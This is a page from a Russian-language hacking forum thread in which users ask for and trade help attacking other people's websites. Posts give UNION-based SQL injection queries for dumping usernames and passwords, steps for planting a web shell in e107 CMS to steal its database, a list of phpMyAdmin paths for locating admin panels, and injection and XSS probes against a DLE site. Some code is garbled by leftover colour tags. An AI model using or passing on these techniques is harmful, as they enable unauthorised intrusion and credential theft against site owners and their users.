HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1669 из 2438 « Первая < 6691169156916191659 1665 1666 1667 1668 1669 1670 1671 1672 1673 1679171917692169 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #16681  
Старый 20.03.2011, 01:18
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28895

Репутация: 4
По умолчанию
Помню раньше на ачате была тема, а в ней предположительные диры где установлен pma, так вот искал и здесь и в гугле что то не нашел, может у кого есть?
 
Ответить с цитированием

  #16682  
Старый 20.03.2011, 02:28
asql
Guest
Сообщений: n/a
Провел на форуме:
8829

Репутация: -3
По умолчанию
Цитата:
Сообщение от Фараон  
Фараон said:
Узнаешь table_schema > select 1,
table_schema
,3 from information_schema.tables where table_name='
table_name
'--
Выводишь данные > select 1,concat_ws(0x3a,username,password),3 from
table_schema
.
table_name
спс, там их 6 оказалось)
 
Ответить с цитированием

  #16683  
Старый 20.03.2011, 11:56
[R]eD
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171

Репутация: 3
По умолчанию
Как можно залить шелл в e107 CMS если стоит ограничение через filetypes.php, т.е. через плагины/темы загрузить нельзя...

цель - слить бд

помогите
 
Ответить с цитированием

  #16684  
Старый 20.03.2011, 12:20
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию
Цитата:
Сообщение от [R  
eD"]
[R]eD said:
Как можно залить шелл в e107 CMS если стоит ограничение через filetypes.php, т.е. через плагины/темы загрузить нельзя...
цель - слить бд
помогите
https://rdot.org/forum/showthread.php?t=3 пост Strilo4ka.

Если не понял, то просто создаешь форму у себя на компе:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][COLOR="#0000BB"]Отправить этот файл[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]Название шелла[/COLOR][COLOR="#007700"]!

[/COLOR][/COLOR
Заходишь e107_admin/language.php?tools . Там редактируешь файл lan_banner.php вписав в него ");?> .

Затем через форму которую создал льешь шелл. Он будет по адресу http://[host]/[path]/e107_languages/shell.php
 
Ответить с цитированием

  #16685  
Старый 20.03.2011, 12:49
Compton
Участник форума
Регистрация: 31.01.2010
Сообщений: 170
Провел на форуме:
1442841

Репутация: 63
Отправить сообщение для Compton с помощью AIM Отправить сообщение для Compton с помощью Yahoo
По умолчанию
Цитата:
Сообщение от Lijzer  
Lijzer said:
Помню раньше на ачате была тема, а в ней предположительные диры где установлен pma, так вот искал и здесь и в гугле что то не нашел, может у кого есть?
Код:
Code:
web/phpMyAdmin/
admin/pma/
admin/phpmyadmin/
admin/mysql/
phpmyadmin2/
mysqladmin/
mysql-admin/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.1/
phpMyAdmin-2.2.3/
phpMyAdmin-2.2.6/
myadmin/
phpMyA/
phpmyad/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.0-pl1/
phpMyAdmin-2.6.3-pl1/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.3-rc1/
phpMyAdmin-2.6.2-rc1/
phpMyAdmi/
phpMyAdmin1/
phpMyAdmin2/
phpMyAdmin-2/
phpMyAdmin-2.10.0/
phpMyAdmin-2.3.0/
phpMyAdmin-2.3.1/
phpMyAdmin-2.3.2/
phpMyAdmin-2.3.3/
phpMyAdmin-2.3.4/
phpMyAdmin-2.3.5/
phpMyAdmin-2.3.6/
phpMyAdmin-2.3.7/
phpMyAdmin-2.3.8/
phpMyAdmin-2.3.9/
phpMyAdmin-2.4.0/
phpMyAdmin-2.4.1/
phpMyAdmin-2.4.2/
phpMyAdmin-2.4.3/
phpMyAdmin-2.4.4/
phpMyAdmin-2.4.5/
phpMyAdmin-2.4.6/
phpMyAdmin-2.4.7/
phpMyAdmin-2.4.8/
phpMyAdmin-2.4.9/
phpMyAdmin-2.5.0/
phpMyAdmin-2.5.1/
phpMyAdmin-2.5.2/
phpMyAdmin-2.5.3/
phpMyAdmin-2.5.4/
phpMyAdmin-2.5.5/
phpMyAdmin-2.5.6/
phpMyAdmin-2.5.7/
phpMyAdmin-2.5.8/
phpMyAdmin-2.5.9/
phpMyAdmin-2.6.0/
phpMyAdmin-2.6.1/
phpMyAdmin-2.6.2/
phpMyAdmin-2.6.3/
phpMyAdmin-2.6.4/
phpMyAdmin-2.6.5/
phpMyAdmin-2.6.6/
phpMyAdmin-2.6.7/
phpMyAdmin-2.6.8/
phpMyAdmin-2.6.9/
phpMyAdmin-2.7.0/
phpMyAdmin-2.7.1/
phpMyAdmin-2.7.2/
phpMyAdmin-2.7.3/
phpMyAdmin-2.7.4/
phpMyAdmin-2.7.5/
phpMyAdmin-2.7.6/
phpMyAdmin-2.7.7/
phpMyAdmin-2.7.8/
phpMyAdmin-2.7.9/
phpMyAdmin-2.8.1/
phpMyAdmin-2.8.2/
phpMyAdmin-2.8.3/
phpMyAdmin-2.8.4/
phpMyAdmin-2.8.5/
phpMyAdmin-2.8.6/
phpMyAdmin-2.8.7/
phpMyAdmin-2.8.8/
phpMyAdmin-2.8.9/
phpMyAdmin-2.9.1/
phpMyAdmin-2.9.2/
phpMyAdmin-3/
phpMyAdmin-4/
phpMyAds/
phpmyad-sys/
 
Ответить с цитированием

  #16686  
Старый 20.03.2011, 14:37
[R]eD
Познающий
Регистрация: 01.08.2006
Сообщений: 35
Провел на форуме:
94171

Репутация: 3
По умолчанию
Цитата:
Сообщение от Фараон  
Фараон said:
https://rdot.org/forum/showthread.php?t=3 пост Strilo4ka.
Если не понял, то просто создаешь форму у себя на компе:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]

[/COLOR][COLOR="#0000BB"]Отправить этот файл[/COLOR][COLOR="#007700"]:

[/COLOR][COLOR="#0000BB"]Название шелла[/COLOR][COLOR="#007700"]!

[/COLOR][/COLOR
Заходишь e107_admin/language.php?tools . Там редактируешь файл lan_banner.php вписав в него
");?>
.
Затем через форму которую создал льешь шелл. Он будет по адресу http://[host]/[path]/e107_languages/shell.php
теперь не хаватает прав ((

видимо больше способов нету (
 
Ответить с цитированием

  #16687  
Старый 20.03.2011, 14:39
KREGI
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759

Репутация: -9
По умолчанию
привет

есть сайт на DLE, версию не знаю

есть уязвимость вида

Код:
Code:
http://site.ru/index.php?subaction=userinfo&user=%2527
при подстановки sql запроса, все что я написал выводится в title, мб кто сталкивался с раскруткой такой inj
 
Ответить с цитированием

  #16688  
Старый 20.03.2011, 15:07
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию
Цитата:
Сообщение от KREGI  
KREGI said:
привет
есть сайт на DLE, версию не знаю
есть уязвимость вида
Код:
Code:
http://site.ru/index.php?subaction=userinfo&user=%2527
при подстановки sql запроса, все что я написал выводится в title, мб кто сталкивался с раскруткой такой inj
Быть может это и не sql inj вовсе?
 
Ответить с цитированием

  #16689  
Старый 20.03.2011, 15:15
KREGI
Новичок
Регистрация: 09.02.2009
Сообщений: 23
Провел на форуме:
51759

Репутация: -9
По умолчанию
Цитата:
Сообщение от Isis  
Isis said:
Быть может это и не sql inj вовсе?
хм, а что же?
 
Ответить с цитированием

  #16690  
Старый 20.03.2011, 15:19
Isis
Флудер
Регистрация: 20.11.2006
Сообщений: 3,316
Провел на форуме:
16641028

Репутация: 2371


По умолчанию
Цитата:
Сообщение от KREGI  
KREGI said:
хм, а что же?
Да ничего, обычный вывод в тайтл.

Попробуй ввести туда

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][COLOR="#0000BB"]alert[/COLOR][COLOR="#007700"](/[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]/)[/COLOR][COLOR="#0000BB"][/COLOR][/COLOR
Может xss будет
 
Ответить с цитированием
Ответ
Страница 1669 из 2438 « Первая < 6691169156916191659 1665 1666 1667 1668 1669 1670 1671 1672 1673 1679171917692169 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ